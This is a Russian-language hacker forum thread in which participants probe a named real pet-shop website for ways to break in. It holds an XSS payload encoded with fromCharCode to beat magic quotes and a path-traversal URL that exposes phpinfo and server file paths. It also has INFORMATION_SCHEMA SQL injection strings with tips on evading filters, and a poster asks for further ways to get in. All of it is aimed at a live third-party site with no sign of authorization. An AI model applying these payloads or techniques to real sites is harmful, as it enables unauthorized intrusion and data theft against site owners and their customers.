если бы опция magic quotes не была включена, то

а не можно заxeк‎сить?

выше способ дали рабочий

кстати в поле поиска пасивка.
чтоб обойти mg юзаем асции
<script>alert(String.fromCharCode(88,83,83))</script>
ps http://forum.xakep.ru/m_1298634/tm.htm - понрвилось

попугай, wildshaman, Strilo4ka спасибо за помощь и советы


копаю дальше
http://www.petshopdamigos.gr/index.php?action=/../../../../../../inetpub/vhosts/petshopdamigos.gr/httpdocs/admin/info - phpinfo()

есть
E:\inetpub\vhosts\petshopdamigos.gr\httpdocs\index .php
E:\inetpub\vhosts\petshopdamigos.gr\httpdocs\pages \config.php
E:\inetpub\vhosts\petshopdamigos.gr\httpdocs\pages \functions.php
E:\inetpub\vhosts\petshopdamigos.gr\httpdocs\admin \index.php
E:\inetpub\vhosts\petshopdamigos.gr\httpdocs\admin \config.php
E:\inetpub\vhosts\petshopdamigos.gr\httpdocs\admin \functions.php
E:\inetpub\vhosts\petshopdamigos.gr\httpdocs\admin \info.php
но текст их посмотреть нельзя, только исполнение через require()

http://www.petshopdamigos.gr/test - basic авторизация, ни .htaccess ни .htpasswd там нет, да и сервер там Microsoft-IIS/6.0

доступ к соседям закрыт - Permission denied

sql inj вроде как нигде нет

через http://www.petshopdamigos.gr/index.php?action=05 можно попасть на форму, которая через mail() будет слать письмо

http://www.petshopdamigos.gr/index.php?action=09 ссылок на которую ниоткуда нет выдает:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in E:\inetpub\vhosts\petshopdamigos.gr\httpdocs\pages \action_09.php on line 9


есть идеи с какой стороны еще можно залезть ?

не выводит таблицы ID=1+OR+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATIO N_SCHEMA.TABLES)--
в чем может быть проблема?

зато выводит колонки
ID=1+OR+1=(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATI ON_SCHEMA.COLUMNS)--

возможно фильтр на TABLE_NAME, попробуй перевести TABLE_NAME в hex или char
или фильтр на INFORMATIO N_SCHEMA.TABLES - тоже обходится, но как не помню, пусть более просвещенные подскажут

операторы нельзя переводить в hеx или char